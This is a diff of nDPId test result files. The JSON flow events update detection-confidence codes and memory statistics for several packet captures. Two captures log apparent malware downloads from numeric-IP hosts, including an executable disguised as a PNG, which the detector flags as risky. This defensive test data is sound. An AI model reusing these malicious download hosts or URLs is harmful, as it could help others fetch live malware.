00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1352718180397,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180397,"pkt":"AAC8X0lReOfR4AJeCABFAADqcEpAAIAGAACNUQAKjVEAF\/T9rxIm2H0TxmFi41AY9W4boAAAcACqAAABAhAAAAAAo6iTAAAAAAAAAAAAAAAAAAoAAgChAAQAAQOLALEAlgBx7AoCIAIkAQQACgAoAEYAagBODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMQEAAf9ODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMgEAAf9OD5EbTE1TX0RJU0FCTEVfQkFSQ09ERV9TQ0FOTkVSAAEAAP5OD5EbTE1TX1NFVFBPSU5UQ0hBTkdFX1JFQ0VJVkVEAAEAAP4="} 
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1352718180400,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1352718180400,"pkt":"eOfR4AJeAAC8X0lRCABFAAB0TSZAAEAG0pqNUQAXjVEACq8S9P3GYWLjJth91VAYEADGbgAAcAA0AAABAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAtccAgLEAIABx7IoAAAAEAAoADgASABYAzgAAAM4AAADOAAAAzgAAAA=="} 
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1352718180599,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1352718180599,"pkt":"AAC8X0lReOfR4AJeCABFAAAocJ5AAIAGAACNUQAKjVEAF\/T9rxIm2H3VxmFjL1AQ+vAa3gAA"} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-payload-len":11876,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1352718181050} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 @@ -33,9 +33,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875523 bytes -~~ total memory freed........: 5875523 bytes -~~ total allocations/frees...: 118226/118226 +~~ total memory allocated....: 6009157 bytes +~~ total memory freed........: 6009157 bytes +~~ total allocations/frees...: 120988/120988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 458 chars ~~ json string max len.......: 2075 chars 
diff --git a/test/results/exe_download.pcap.out b/test/results/exe_download.pcap.out index c3d43a558..93c247392 100644 --- a/test/results/exe_download.pcap.out +++ b/test/results/exe_download.pcap.out 
@@ -4,9 +4,9 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434051004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434051004,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0AI9AAIAGAKkKCRllkFtFw8ANAFC+hvgeAAAAAIACIADegAAAAgQFtAEDAwgBAQQC"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434051324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434051324,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsBbAAAIAGO5CQW0XDCgkZZQBQwA0+79i4vob4H2AS+vAU7QAAAgQFtA=="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434051324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434051324,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoALJAAIAGAJIKCRllkFtFw8ANAFC+hvgfPu\/YuVAQ+vAsqgAA"} -01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": 
{"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} -01174{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} 
-01040{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"thread_ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} +01174{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} +01040{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"thread_ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App 
Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","packets-captured":703,"packets-processed":703,"total-skipped-flows":0,"total-l4-payload-len":679485,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1569434056186} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 703/703 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5889997 bytes -~~ total memory freed........: 5889997 bytes -~~ total allocations/frees...: 118823/118823 +~~ total memory allocated....: 6023631 bytes +~~ total memory freed........: 6023631 bytes +~~ total allocations/frees...: 121585/121585 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1179 chars diff --git a/test/results/exe_download_as_png.pcap.out b/test/results/exe_download_as_png.pcap.out index 1c5722fa8..a13b5ec8d 100644 --- a/test/results/exe_download_as_png.pcap.out +++ b/test/results/exe_download_as_png.pcap.out 
@@ -4,9 +4,9 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434903040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434903040,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0Bk9AAIAGv+sKCRlluWJXucAtAFB7PMGWAAAAAIACIAAdNgAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434903440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434903440,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsESIAAIAG9SC5Yle5CgkZZQBQwC0vLgrVezzBl2AS+vAxRwAAAgQFtA=="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434903440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434903440,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoBlJAAIAGv\/QKCRlluWJXucAtAFB7PMGXLy4K1lAQ+vBJBAAA"} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}} -01037{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}} 
-00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}} 
+01037{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}} +00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","packets-captured":534,"packets-processed":534,"total-skipped-flows":0,"total-l4-payload-len":500597,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1569434972556} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 534/534 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5885027 bytes -~~ total memory freed........: 5885027 bytes -~~ total allocations/frees...: 118653/118653 +~~ total memory allocated....: 6018661 bytes +~~ total memory freed........: 6018661 bytes +~~ total allocations/frees...: 121415/121415 